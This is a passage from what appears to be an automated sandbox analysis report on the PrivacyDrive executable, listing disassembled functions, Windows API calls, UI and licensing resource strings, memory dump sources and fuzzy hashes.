                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4), ref: 004166B0
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 004166C8
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,SPLASH), ref: 004166F5
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00416707
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,SPLASH), ref: 00416734
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00416746
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: BACKGROUND_BEGIN$BACKGROUND_END$BORDER$BORDER_BACKGROUND$BOTTOM_BACKGROUND_BEGIN$BOTTOM_BACKGROUND_END$BOTTOM_GLOSS_BEGIN$BOTTOM_GLOSS_END$BOTTOM_GLOSS_HEIGHT$BUTTON_ICON_CREATE$BUTTON_ICON_CREATE_DISABLE$BUTTON_ICON_MOUNT$BUTTON_ICON_OPEN$BUTTON_MAX_WIDTH$BUTTON_X$CHECKBOX_X$CHECKBOX_Y$CREATE_BUTTON_Y$Dialog$FILLET$FILLET2$MOUNT_BUTTON_Y$OPEN_BUTTON_Y$SPLASH$TITLE_BACKGROUND$TITLE_TEXT$TITLE_TEXT_X$TITLE_TEXT_Y
                                • API String ID: 904232820-1141765326
                                • Opcode ID: 35522f0b04ca4be707e10ffd28e030f0d56883e665f9f3f9c3e985f07e1a6f6e
                                • Instruction ID: 2fc7c05858f9a66c6cfd96f8bf2dbc2561cf7bfbee2527b4f19f709cef2b5722
                                • Opcode Fuzzy Hash: 35522f0b04ca4be707e10ffd28e030f0d56883e665f9f3f9c3e985f07e1a6f6e
                                • Instruction Fuzzy Hash: 2C51F07C3A13016BFE1466724D53BAA19857B44F45F05002EBE05AF3C2FFA9E94182AE
                                Function 0042A1E0 Relevance: 51.2, APIs: 34, Instructions: 168COMMON
                                Download Yara Rule
                                APIs
                                • GdipDeleteFont.GDIPLUS(?,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A204
                                • GdipFree.GDIPLUS(00000000,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A209
                                • GdipDeleteFont.GDIPLUS(?,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A224
                                • GdipFree.GDIPLUS(00000000,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A229
                                • GdipDeleteFont.GDIPLUS(?,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A244
                                • GdipFree.GDIPLUS(00000000,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A249
                                • GdipDeleteFont.GDIPLUS(?,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A264
                                • GdipFree.GDIPLUS(00000000,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A269
                                • GdipDeleteFont.GDIPLUS(?,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A284
                                • GdipFree.GDIPLUS(00000000,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A289
                                • GdipDeleteFont.GDIPLUS(?,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A2A4
                                • GdipFree.GDIPLUS(00000000,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A2A9
                                • GdipDeleteFont.GDIPLUS(?,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A2C4
                                • GdipFree.GDIPLUS(00000000,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A2C9
                                • GdipDeleteFont.GDIPLUS(?,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A2E4
                                • GdipFree.GDIPLUS(00000000,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A2E9
                                • GdipDeleteFont.GDIPLUS(?,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A304
                                • GdipFree.GDIPLUS(00000000,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A309
                                • GdipDeleteFont.GDIPLUS(?,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A324
                                • GdipFree.GDIPLUS(00000000,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A329
                                • GdipDeleteFont.GDIPLUS(?,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A344
                                • GdipFree.GDIPLUS(00000000,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A349
                                • GdipDeleteFont.GDIPLUS(?,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A364
                                • GdipFree.GDIPLUS(00000000,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A369
                                • GdipDeleteFont.GDIPLUS(?,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A384
                                • GdipFree.GDIPLUS(00000000,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A389
                                • GdipDeleteFont.GDIPLUS(?,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A3A4
                                • GdipFree.GDIPLUS(00000000,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A3A9
                                • GdipDeleteFont.GDIPLUS(?,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A3C4
                                • GdipFree.GDIPLUS(00000000,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A3C9
                                • GdipDeleteFont.GDIPLUS(?,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A3E4
                                • GdipFree.GDIPLUS(00000000,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A3E9
                                • GdipDeleteFont.GDIPLUS(?,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A404
                                • GdipFree.GDIPLUS(00000000,?,?,?,?,?,00428F2B,7563D392,?,?,?,0053D5CE,000000FF,?,00428ECB), ref: 0042A409
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$DeleteFontFree
                                • String ID:
                                • API String ID: 812453785-0
                                • Opcode ID: 85f1a0658d7a6c1520944a73693c8b73f796a5a2d80e79b62369b9ceba35918b
                                • Instruction ID: a600931a1200e0b0a12dd47269ba79f86ba2d1d5da6e5a05ecaeb6b46089f4f5
                                • Opcode Fuzzy Hash: 85f1a0658d7a6c1520944a73693c8b73f796a5a2d80e79b62369b9ceba35918b
                                • Instruction Fuzzy Hash: 1361E470500A05EFDB22DF76CD58B8BBBF5BF45300F5044A9D85997260EB36EA14EB05
                                Function 004372D0 Relevance: 46.7, APIs: 6, Strings: 25, Instructions: 205COMMON
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4), ref: 004372E0
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 004372F8
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,ABOUT), ref: 00437325
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00437337
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,ABOUT), ref: 00437364
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00437376
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: ABOUT$Dialog$PM_BUTTON_ACTIVATE_Y$PM_BUTTON_BUY_NOW_Y$PM_COPYRIGHT_Y$PM_ICON_X$PM_ICON_Y$PM_LINE_1_Y$PM_LINE_2_Y$PM_LINK_EMAIL_X$PM_LINK_EMAIL_Y$PM_LINK_WEBSITE_X$PM_LINK_WEBSITE_Y$PM_STRING_EXPIRATION_DATE_X$PM_STRING_EXPIRATION_DATE_Y$PM_STRING_LICENSE_NAME_X$PM_STRING_LICENSE_NAME_Y$PM_STRING_LICENSE_TYPE_X$PM_STRING_LICENSE_TYPE_Y$PM_STRING_WARNING_HEIGHT$PM_STRING_WARNING_WIDTH$PM_STRING_WARNING_X$PM_STRING_WARNING_Y$PM_TITLE_Y$PM_VERSION_Y
                                • API String ID: 904232820-3172832796
                                • Opcode ID: 5f5d2d318a346c737033fad44e2267e20554e4465a3fba6b5af3b0e289f42026
                                • Instruction ID: 3ab152cbf2ec4c6e8b681e91df5937ecf2c508342c02bdc27f6dbbc580ac0622
                                • Opcode Fuzzy Hash: 5f5d2d318a346c737033fad44e2267e20554e4465a3fba6b5af3b0e289f42026
                                • Instruction Fuzzy Hash: EF51F7603853013AEDA97332DC53F7F19966B44F19F05003ABA46BA2C2EFDCDA01969D
                                Function 004A2510 Relevance: 43.7, APIs: 6, Strings: 23, Instructions: 200COMMON
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4,?,?,?,004A232A,00403019), ref: 004A2520
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 004A2538
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,BASE_DIALOG), ref: 004A2565
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 004A2577
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,00000000,BASE_DIALOG), ref: 004A25A4
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 004A25B6
                                  • Part of subcall function 004A4220: EnterCriticalSection.KERNEL32(005BDCE4,00000000,00000000,?,004A26E3,?,MESSAGE_BOX,00000013,TITLE_HEIGHT,00000012,BORDER,00000011,DOTLINE_BOTTOM,00000010,BUTTON_INTERVAL,0000000F), ref: 004A422C
                                  • Part of subcall function 004A4220: LeaveCriticalSection.KERNEL32(005BDCE4,?,004A26E3,?,MESSAGE_BOX,00000013,TITLE_HEIGHT,00000012,BORDER,00000011,DOTLINE_BOTTOM,00000010,BUTTON_INTERVAL,0000000F,BUTTON_BOTTOM,0000000E), ref: 004A423F
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: BASE_DIALOG$BORDER$BUTTON_BOTTOM$BUTTON_HEIGHT$BUTTON_INTERVAL$BUTTON_RIGHT$CLIENT_BOTTOM$CLIENT_LEFT$CLIENT_RIGHT$CLIENT_TOP$CONFIRMATION$DOTLINE_BOTTOM$Dialog$ERROR$ICON_X$ICON_Y$INFORAGIN_MIN_HEIGHT$INFORAGIN_MIN_WIDTH$INFORMATION$LEFT$MESSAGE_BOX$TITLE_HEIGHT$WARNING
                                • API String ID: 904232820-3138118559
                                • Opcode ID: 1640581fab820ff2bdfc72f5d70bf52333e9f35beb7892fc70a076206694ddfe
                                • Instruction ID: 5ca2536b4346ff9ed5bfbdf02d6f25b29927509dd26d6d1bd30ed9ba06bc3021
                                • Opcode Fuzzy Hash: 1640581fab820ff2bdfc72f5d70bf52333e9f35beb7892fc70a076206694ddfe
                                • Instruction Fuzzy Hash: BF515434380712ABE94C73764E63F6A9D447B55B49F04012BBE05BA3C1EFD8E901936D
                                Function 004375B0 Relevance: 42.1, APIs: 3, Strings: 21, Instructions: 131COMMON
                                Download Yara Rule
                                APIs
                                • TryEnterCriticalSection.KERNEL32(005BDCCC), ref: 004375B8
                                • LeaveCriticalSection.KERNEL32(005BDCCC,Dialog,ABOUT), ref: 004375DF
                                • LeaveCriticalSection.KERNEL32(005BDCCC,00000011,STR_WARNING,00000010,STR_NEVER_EXPIRE,0000000F,STR_EXPIRED,0000000E,STR_FULL_VERSION,0000000D,STR_EVALUATION,0000000C,STR_PERIOD,00000013,STR_TRIAL_USER,0000000A), ref: 00437768
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$Leave$Enter
                                • String ID: ABOUT$BUTTON_ACTIVATE$BUTTON_BUY_NOW$BUTTON_OK$BUTTON_RENEW_NOW$Dialog$LABEL_EMAIL$LABEL_EXPIRATION_DATE$LABEL_LICENSE_INFORMATION$LABEL_LICENSE_NAME$LABEL_LICENSE_TYPE$LABEL_VERSION$LABEL_WEBSITE$PZ$STR_EVALUATION$STR_EXPIRED$STR_FULL_VERSION$STR_NEVER_EXPIRE$STR_PERIOD$STR_TRIAL_USER$STR_WARNING
                                • API String ID: 2978645861-1264822288
                                • Opcode ID: 00a2a97fe1f60d0aec0fcebd03ac9dd2d64f8ef7b0db57bfe3160a173c2d7c58
                                • Instruction ID: 09f988efe70033d8e473a9f7232813dacc2a91003eb6b0b4d5e56ea2171130c4
                                • Opcode Fuzzy Hash: 00a2a97fe1f60d0aec0fcebd03ac9dd2d64f8ef7b0db57bfe3160a173c2d7c58
                                • Instruction Fuzzy Hash: 1E31BE623C472133EA2B25322E17FAE08491B48F55F24605ABE45ADAC1FFCCEE41D55D
                                Function 00405100 Relevance: 39.0, APIs: 16, Strings: 6, Instructions: 471filewindowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004A6F60: EnterCriticalSection.KERNEL32(005BE2CC,0049B07A,0049B078), ref: 004A7032
                                  • Part of subcall function 004A6F60: LeaveCriticalSection.KERNEL32(?,?,?), ref: 004A70D6
                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040535D
                                • ReadFile.KERNEL32(00000000,?,00010000,?,00000000), ref: 00405383
                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 004053A5
                                • CloseHandle.KERNEL32(00000000), ref: 004053B4
                                • GetLastError.KERNEL32 ref: 004053BA
                                • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004053E6
                                • LocalFree.KERNEL32(?), ref: 00405412
                                • CloseHandle.KERNEL32(00000000), ref: 0040543A
                                • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?), ref: 0040553F
                                  • Part of subcall function 004A72E0: DeviceIoControl.KERNEL32(?,07770C40,00000000,00000285,00000000,00000285,?,00000000), ref: 004A736D
                                  • Part of subcall function 004A72E0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004A7390
                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 0040559C
                                • CloseHandle.KERNEL32(00000000), ref: 004055AB
                                • CloseHandle.KERNEL32(00000000), ref: 004055C2
                                • SetLastError.KERNEL32(00000026), ref: 004055CA
                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000,?), ref: 004055F8
                                • SetLastError.KERNEL32(00000072), ref: 0040567F
                                • CloseHandle.KERNEL32(00000000), ref: 0040568B
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CloseHandle$File$ErrorLast$CreateCriticalMessageSectionSize$ControlDeviceEnterFormatFreeLeaveLocalPeekRead
                                • String ID: 0007$0029$0036$0046$0049$0050
                                • API String ID: 2213350598-2618284430
                                • Opcode ID: 3cedeb5193330f896e723b8cf1009cf94272856b10c52bc489cced8b4fc20aa4
                                • Instruction ID: 318539d08eab5a61179405a0b6b8b6fd3223384e63cadc680ddb675490b3d449
                                • Opcode Fuzzy Hash: 3cedeb5193330f896e723b8cf1009cf94272856b10c52bc489cced8b4fc20aa4
                                • Instruction Fuzzy Hash: 63F1C0352147019BEB20AB20CC89FAB37A5EF45705F04052EF955AB3D1DBB8E844CF6A
                                Function 004769B0 Relevance: 38.8, APIs: 8, Strings: 14, Instructions: 279windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,7563D392), ref: 00476A5E
                                • GetLastError.KERNEL32 ref: 00476A64
                                • MessageBoxW.USER32(00000000,Failed to get process path!,Error,00000000), ref: 00476A7C
                                • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,?), ref: 00476B4B
                                  • Part of subcall function 004753C0: VirtualProtect.KERNEL32(HjG,?,00000020,00000000,7563D392), ref: 0047540A
                                  • Part of subcall function 004753C0: VirtualProtect.KERNEL32(HjG,?,00000000,00000000,00000002,HjG,?,00000000), ref: 00475435
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ProtectVirtual$ErrorFileFolderLastMessageModuleNamePath
                                • String ID: %sPortable.xml$Config.xml$Cybertron\Privacy Drive$Error$Failed to get APP_DATA path!$Failed to get Windows path!$Failed to get process path!$HjG$Install$StartService$Uninstall$UserData.dat$\Config.xml$\UserData.dat
                                • API String ID: 2340151771-1550425483
                                • Opcode ID: b49f2d5449e4e3ce363acc4e86bb07c92bc81ca31b1b74e6bf19ad076ae4fd31
                                • Instruction ID: 473965d133ee9a4a4aa847d1be9f38191646d17d8f9cd5fe6bb26ab60e22d3ae
                                • Opcode Fuzzy Hash: b49f2d5449e4e3ce363acc4e86bb07c92bc81ca31b1b74e6bf19ad076ae4fd31
                                • Instruction Fuzzy Hash: 1EB18F70640208ABDB14EB55DC56BED7BB5BF14348F00819EF64AA72C1DF789A84CB98
                                Function 004722B0 Relevance: 36.2, APIs: 6, Strings: 18, Instructions: 164COMMON
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,?,00000000,0047263E,00000000,?,00000000,00000000,?,?,?,?,00000000,0053B15B,000000FF), ref: 004722C0
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,?,?,00000000,0053B15B,000000FF), ref: 004722D8
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Menu,00000394,STANDARD,?,?,?,?,00000000,0053B15B,000000FF), ref: 00472305
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,?,?,00000000,0053B15B,000000FF), ref: 00472317
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Menu,00000374,STANDARD,?,?,?,?,00000000,0053B15B,000000FF), ref: 00472344
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,?,?,00000000,0053B15B,000000FF), ref: 00472356
                                  • Part of subcall function 00424910: EnterCriticalSection.KERNEL32(005BDCE4,?,?,?,004A01A9,Dialog\Button,BASE_DIALOG|CLOSE,0000000C,INACTIVATE_TITLE_TEXT,0000000B,INACTIVATE_TITLE_END,0000000A,INACTIVATE_TITLE_BEGIN,00000009,ACTIVATE_TITLE_END,00000008), ref: 0042491C
                                  • Part of subcall function 00424910: LeaveCriticalSection.KERNEL32(005BDCE4,?,004A01A9,Dialog\Button,BASE_DIALOG|CLOSE,0000000C,INACTIVATE_TITLE_TEXT,0000000B,INACTIVATE_TITLE_END,0000000A,INACTIVATE_TITLE_BEGIN,00000009,ACTIVATE_TITLE_END,00000008,ACTIVATE_TITLE_BEGIN,00000007), ref: 0042492F
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
